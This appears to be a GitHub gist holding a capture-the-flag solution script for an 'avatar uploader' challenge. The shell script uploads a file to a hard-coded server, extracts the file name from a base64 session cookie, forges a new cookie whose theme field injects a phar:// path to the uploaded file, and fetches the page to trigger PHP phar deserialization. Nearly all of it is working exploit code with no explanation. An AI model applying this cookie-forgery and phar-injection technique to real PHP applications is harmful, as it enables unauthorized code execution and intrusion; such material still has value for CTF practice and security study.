Skip to content

Instantly share code, notes, and snippets.

@tyage

tyage/avater-uploader-2

Created May 18, 2019 23:22
Show Gist options
  • Save tyage/f0666a1948e556fcd6c7dfd134fc112b to your computer and use it in GitHub Desktop.
Save tyage/f0666a1948e556fcd6c7dfd134fc112b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
avater-uploader-2
IMAGE=$(curl http://153.127.202.154:1002/upload.php -F "[email protected]" -vvv 2>&1 | grep Set-Cookie | sed -r 's/^.*session=([^.]+).*$/\1/' | base64 -d 2>/dev/null | sed -r 's/^.*avatar":"([^"]+).*$/\1/')
echo $IMAGE
wget http://153.127.202.154:1002/uploads/$IMAGE
node -e "function btoa(str) { var buffer; if (Buffer.isBuffer(str)) { buffer = str; } else { buffer = new Buffer(str.toString(), 'binary'); } return buffer.toString('base64');};console.log('session=' + btoa('{\"name\":\"AAAAAAAAAAAAAAAA\",\"flash\":{\"type\":\"error\",\"message\":\"Uploaded file is not PNG format.\"},\"theme\":\"phar://./uploads/$IMAGE/exploit\"}').replace(/=/g,'') + '.JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt')" > cookie
COOKIE=$(cat cookie)
echo $COOKIE
curl http://153.127.202.154:1002/ -H "Cookie: $COOKIE" --output output
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment